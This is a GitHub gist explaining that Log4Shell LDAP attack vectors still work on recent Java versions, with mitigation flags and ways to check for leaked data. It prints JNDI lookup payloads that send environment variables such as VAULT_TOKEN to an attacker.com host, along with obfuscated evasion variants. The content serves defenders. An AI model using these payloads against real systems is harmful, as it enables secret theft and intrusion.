Skip to content

Instantly share code, notes, and snippets.

@lhotari

lhotari/log4shell_ldap_attack_vectors_on_recent_Java_versions.md Secret

Last active December 14, 2021 11:23
Show Gist options
  • Save lhotari/18292c08586d1982e88658d239f02c57 to your computer and use it in GitHub Desktop.
Save lhotari/18292c08586d1982e88658d239f02c57 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
log4shell_ldap_attack_vectors_on_recent_Java_versions.md

Log4Shell LDAP attack vectors on recent Java versions

This is simply wrong in the Lunasec Log4Shell blog post

JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector.

The LDAP attack vector exists. There are several forms of LDAP attack vectors:

  • leakage of system properties and environment properties with LDAP calls
  • possible DoS attacks with LDAP calls
  • LDAP deserialization attacks resulting to RCE

Using LDAP calls to leak information about environment variables and system properties

Examples:

${jndi:ldap://${env:VAULT_TOKEN}.tokens.attacker.com/a} 
${jndi:ldap://${sys:java.vm.version}.tokens.attacker.com/a}

Notice, there are several evasion techniques, some examples:

  • ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attacker.com/a}
  • ${${lower:-j}${lower:-n}${lower:-d}${lower:-i}:${lower:-l}${lower:-d}${lower:-a}${lower:-p}://attacker.com/a}

Finding out what could have been leaked

  • Listing system properties of an active Java process

    • Use jinfo -sysprops <pid> to list system properties

  • Listing environment variables

    • On Linux, you can list environment variables available in a process with cat /proc/<pid>/environ | xargs -0 -n 1 echo

For docker / k8s containers without a shell or when jinfo doesn't exist, you can use https://github.com/apangin/jattach with the properties command. jattach could be run on the docker host / k8s node. The cat /proc/<pid>/environ | xargs -0 -n 1 echo solution works also on the docker host / k8s node. The pid is the host pid in that case.

LDAP deserialization attacks resulting to RCE

This is one of the points of the blog post PSA: Log4Shell and the current state of JNDI injection , it contains references to other sources with more details (f.e. Exploiting JNDI injections in JDK 1.8.0_191+).

LDAP deserialization attacks are possible even on latest Java versions. Deserialization is enabled by default. It can be disabled on most recent Java versions. For example with system properties

"-Djdk.serialFilter=!*" "-Djdk.jndi.object.factoriesFilter=!*" "-Dcom.sun.jndi.ldap.object.trustSerialData=false"

could be used to disable remote object deserialization when using LDAP over JNDI. These settings could break applications depending on the serialization being enabled and using JNDI. The javadocs in JDK17 contain more information:

There's also Java Serialization Filtering documentation and JEPS-290 . The controls are featured at least in:

Other information

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment